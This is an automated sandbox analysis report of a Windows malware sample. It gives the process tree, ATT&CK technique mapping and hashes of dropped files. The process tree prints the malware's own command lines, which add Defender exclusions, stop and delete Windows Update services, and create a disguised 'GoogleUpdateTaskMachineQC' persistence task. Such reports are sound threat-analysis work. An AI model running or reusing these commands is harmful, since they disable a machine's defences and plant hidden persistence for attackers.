"C:\Users\Admin\AppData\Local\Temp\a38090a5db2eaf318a4b5e7b60cb487d7fb37bdb0aa31097688780dab557b13f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2124

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:400

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
4⤵
- Creates scheduled task(s)
PID:744

C:\Users\Admin\AppData\Local\Temp\setup32.exe
"C:\Users\Admin\AppData\Local\Temp\setup32.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
4⤵
- Suspicious use of WriteProcessMemory
PID:2736

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:4532

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:3588

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:4340

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:1872

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:3524

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
5⤵
PID:4468

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
5⤵
PID:4424

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
5⤵
- Modifies security service
PID:4644

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
5⤵
PID:4668

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
5⤵
PID:3108

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3996

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4556

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#iljoca#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:56756

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
5⤵
PID:100552

C:\Users\Admin\AppData\Local\Temp\setup3221.exe
"C:\Users\Admin\AppData\Local\Temp\setup3221.exe"
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3760

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\Temp\1.vbs"
4⤵
- Blocklisted process makes network request
PID:4684

C:\Windows\Temp\222.exe
"C:\Windows\Temp\222.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4776

C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
"C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2024

C:\Users\Admin\AppData\Local\Temp\watchdog.exe
"C:\Users\Admin\AppData\Local\Temp\watchdog.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4528

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:100468

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:100580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5112

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:5308

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:5456

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:5520

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:5552

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:5608

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:5672

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:5688

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:5704

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:5720

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:5740

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:5788

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5320

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:5472

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:5536

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:5588

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:5656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#cthbhmckn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5352

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe ekwaxvtzumfvch
2⤵
PID:6796

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:6860

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
- Modifies data under HKEY_USERS
PID:6900

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:6808

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe cxfacjpoynzyzzmc GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1g/oS7Mgp0E17ll9y0I6gqFt/X0Sayxrm+G3lICBwYbS
2⤵
PID:6936

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:101088

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Scripting

T1064

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
6.9MB

MD5
a82a470f0d0f7a7ebcc1735f2ba2717b

SHA1
7c5c8ff69c12cf328792ae85517d76d4591258fc

SHA256
c451372c8cab80d572af86c3bbb34617f481eb59a79b2f6053851982bae54e15

SHA512
ed04a6c739314f95d645ec15890b4056382210a9ca9fc0eff888c547a6291bd5a294781e07590c71a2261d7e8a5512ba82b5a9f0b0308b84e7c6eb1e9e45e302

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
1KB

MD5
2f72537f636dc6eee43878bc859a4ec0

SHA1
5dcd85434721902b906d4e06907873844760d348

SHA256
39702baf633ce7008b7be66ed67aec862ac6d2b6a4ed975cafaa9e5e6aba2a89

SHA512
675553a3e6f33a2f2e98488ced3e01be15a65ea9b46c4976be590b2683b99162684318d926e5f605d51febbf460f845345968b14786b8b6d199a539439007f43

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
Filesize
438B

MD5
97fd9449940713acf68030add3e4204b

SHA1
95ce0cf40808374aeb21039a35ddd0b8c7f01cb3

SHA256
d44521150cd28304363ce8091a6ddaa311b29978cc095a2b2127c1ce588415af

SHA512
04f38795533aafb7bfc572abfeadd2793b51d04901ea9c467cb11c4bc064969dad04132267a3fb63475c68ac39e2ce39696c0b8fc953dccf675e51ba4037a639

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
51fcb03fd529cb27b2f3eeeb33e5ec69

SHA1
df95b30251e46bc343861bf8798e079fbaef0fcc

SHA256
fd3f2885fecee3f55b31c85f76189204ee3f57e3f6f8b9dbfb0776192a0acf3f

SHA512
2c9f4d1f42dbde9e04a2718828ddaf1e815d33de1f96a5e2df7848325b1f68eaa0fca61ba2ec7202ca441085509b05ad5d0890c253c7d0c8bdbbe0c6629d7c57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
3f4d28364868522059e49ff13c1d13bd

SHA1
0264cce5f102071ec65170ed32f10252120c430a

SHA256
2844ab7780c474bdb3d9c9acd7d2e078356734466353876b5e0fd1ff8b07c09c

SHA512
705203757c966fef2a7b9c54ccac898c0a3c1a5a78a9fd4dd8eff475f48792ccc70dd2e7bc72a815212cce83322e6b1d3e0d76ea1d671c3d8f111d250f0de277

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
503c2e5233fa6b4e3556fdf9e9fb78cf

SHA1
c94e1a1220087ec5e01c07cf4f4bfc234bc3aa4c

SHA256
af2f7319195df494cd6b7e65e547002be46ee747d59d9d921908b20b3a9ff304

SHA512
7ca5c2c857644bff68bdc14f80f508488d5efb4ad3ef517f70559f4eee5fd83613f111dca5ad198330f7154293d975fee9c448c0545177b5de79e333e2b7bd03

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.0.2-beta.exe
Filesize
61KB

MD5
503c2e5233fa6b4e3556fdf9e9fb78cf

SHA1
c94e1a1220087ec5e01c07cf4f4bfc234bc3aa4c

SHA256
af2f7319195df494cd6b7e65e547002be46ee747d59d9d921908b20b3a9ff304

SHA512
7ca5c2c857644bff68bdc14f80f508488d5efb4ad3ef517f70559f4eee5fd83613f111dca5ad198330f7154293d975fee9c448c0545177b5de79e333e2b7bd03

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup32.exe
Filesize
6.9MB

MD5
c24701f805733b3f6c168df6757a8a2b

SHA1
6e89449a661461a409593624513a7bc0e2eb35b9

SHA256
40220335eb7ec4c39d6e364b7703ba03dd5c366a7614e6d4a518e72789012816

SHA512
f2a8182884a28985b6c1f4e4df9d7c76b95809daa889f0bac6a61970d315115ba98d936889f58a2746d55534acae0e49769485055e0c8f7f087b15b66186dca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
371KB

MD5
c37dbfe1a351c35aa355cce7f2838145

SHA1
3d6e7eddb3a4b37eb520ad5333658614c62686cb

SHA256
f3fd5f08a134e80a1c5ffeba061110d4a3fcf1ed54f0e89233d4cf5b2a880435

SHA512
68a7b3680e85fd54b8b5da3e3ac6cf1782a32f31b73cf52fcf06512fcb045e37ca8da8f5615df299df0c993581588a550552f5e696738824fa3b74824b1f7a8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup3221.exe
Filesize
371KB

MD5
c37dbfe1a351c35aa355cce7f2838145

SHA1
3d6e7eddb3a4b37eb520ad5333658614c62686cb

SHA256
f3fd5f08a134e80a1c5ffeba061110d4a3fcf1ed54f0e89233d4cf5b2a880435

SHA512
68a7b3680e85fd54b8b5da3e3ac6cf1782a32f31b73cf52fcf06512fcb045e37ca8da8f5615df299df0c993581588a550552f5e696738824fa3b74824b1f7a8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
e30c4e895f1a8146529aeb49b2f3bba2

SHA1
c40402e1cf7342c8fee841fda4b2ef081be30efe

SHA256
17dfb0bed5a23a4453de08f1a8c4d5379fe62a6281abdbc151b619d958ea0c27

SHA512
52edc92251212c5dc79386ff2a34c530f2c506c0158402b349d12ddc272b9958795c9345ac40c1c9eb8af205cbb4d4208799590f8091307cbf1f285e2d9f97f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\watchdog.exe
Filesize
2.5MB

MD5
e30c4e895f1a8146529aeb49b2f3bba2

SHA1
c40402e1cf7342c8fee841fda4b2ef081be30efe

SHA256
17dfb0bed5a23a4453de08f1a8c4d5379fe62a6281abdbc151b619d958ea0c27

SHA512
52edc92251212c5dc79386ff2a34c530f2c506c0158402b349d12ddc272b9958795c9345ac40c1c9eb8af205cbb4d4208799590f8091307cbf1f285e2d9f97f5

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
Filesize
1.3MB

MD5
2d6153e8a40769cd739eb79300337522

SHA1
969b1faf9926a3a68a7c18d117f2dd6931a1ca7d

SHA256
7c1df5f1c62db80febbdfee35ceb800df85bcbc1fa6de062f069cebc109b18e9

SHA512
606ae72de064fbe10190261abd08c900a893131cd47702dae565fe73c3e4650f125a95be0d2984995237bc731b058a33a89d18d47a487b75a1271d2930c5a91b

Download Submit
C:\Windows\Temp\1.vbs
Filesize
105B

MD5
7402b8035ec1c280ca12067fb48f78cf

SHA1
f53efaa35eca6c64b1a54d250cd644d07269c787

SHA256
6479ad76955df79ac09773987823c4ca59f16db33668dae727d97c05178d2726

SHA512
bb7c9bf83e31de09f483221ee24ca12425c95e4e01005d8473666302e42b3633c974407d1053fd970fb325f1d35529c802486444fe5bc6ca72f024ff8d7d7d0b

Download Submit
C:\Windows\Temp\222.exe
Filesize
107KB

MD5
2233e570ad3c150909e29e7b9f14365c

SHA1
f575f9e9437d20311d7f3f6761afd010942485f6

SHA256
ab3fbfd93b11073b6167a7dae10814ea12c9d6ec98b88b58cf64bbd615cb4e97

SHA512
d4f1db0ace6e896a843bb19c58fdf6029bcf7de0146b8b29e01351b8421ea4975a089178987fdb9b93ad87769de6f2627c45eb75eed6c6b913ac482bdb0bcb85

Download Submit
C:\Windows\Temp\222.exe
Filesize
107KB

MD5
2233e570ad3c150909e29e7b9f14365c

SHA1
f575f9e9437d20311d7f3f6761afd010942485f6

SHA256
ab3fbfd93b11073b6167a7dae10814ea12c9d6ec98b88b58cf64bbd615cb4e97

SHA512
d4f1db0ace6e896a843bb19c58fdf6029bcf7de0146b8b29e01351b8421ea4975a089178987fdb9b93ad87769de6f2627c45eb75eed6c6b913ac482bdb0bcb85

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
811d351aabd7b708fef7683cf5e29e15

SHA1
06fd89e5a575f45d411cf4b3a2d277e642e73dbb

SHA256
0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18

SHA512
702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
302a7c179ef577c237c5418fb770fd27

SHA1
343ef00d1357a8d2ff6e1143541a8a29435ed30c

SHA256
9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f

SHA512
f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
309c8cf411f6740f1b9d04f0513514ba

SHA1
9d06283d7b7ed32721731c182c2927dbe259ea15

SHA256
ccdac7b56dfc48ec24d4fab249d4524969501fd0ec19f6f95ced6556e581d409

SHA512
3b7e81a85fd3fa76cbdff588b146f969a0b83a182ddd88abda50cfb80723afca5479811b3e4606c1364f930a1a28433d6aab789018d70006361546413c38cbf9

Download Submit
\Users\Admin\AppData\LocalLow\mozglue.dll
Filesize
612KB

MD5
f07d9977430e762b563eaadc2b94bbfa

SHA1
da0a05b2b8d269fb73558dfcf0ed5c167f6d3877

SHA256
4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862

SHA512
6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

Download Submit
\Users\Admin\AppData\LocalLow\nss3.dll
Filesize
1.9MB

MD5
f67d08e8c02574cbc2f1122c53bfb976

SHA1
6522992957e7e4d074947cad63189f308a80fcf2

SHA256
c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e

SHA512
2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

Download Submit
\Users\Admin\AppData\LocalLow\sqlite3.dll
Filesize
1.0MB

MD5
dbf4f8dcefb8056dc6bae4b67ff810ce

SHA1
bbac1dd8a07c6069415c04b62747d794736d0689

SHA256
47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68

SHA512
b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

Download Submit
memory/400-124-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/400-120-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/400-612-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/400-125-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/400-123-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/400-122-0x0000000140000000-0x0000000140023000-memory.dmp

Filesize
140KB

Download
memory/400-121-0x0000000140003FAC-mapping.dmp

Download
memory/744-212-0x0000000000000000-mapping.dmp

Download
memory/1872-576-0x0000000000000000-mapping.dmp

Download
memory/2024-460-0x0000000000000000-mapping.dmp

Download
memory/2640-563-0x0000000000000000-mapping.dmp

Download
memory/2644-167-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-126-0x0000000000000000-mapping.dmp

Download
memory/2644-162-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-163-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-164-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-165-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-166-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-160-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-168-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-169-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
1.6MB

Download
memory/2644-170-0x0000000077710000-0x000000007789E000-memory.dmp

Filesize
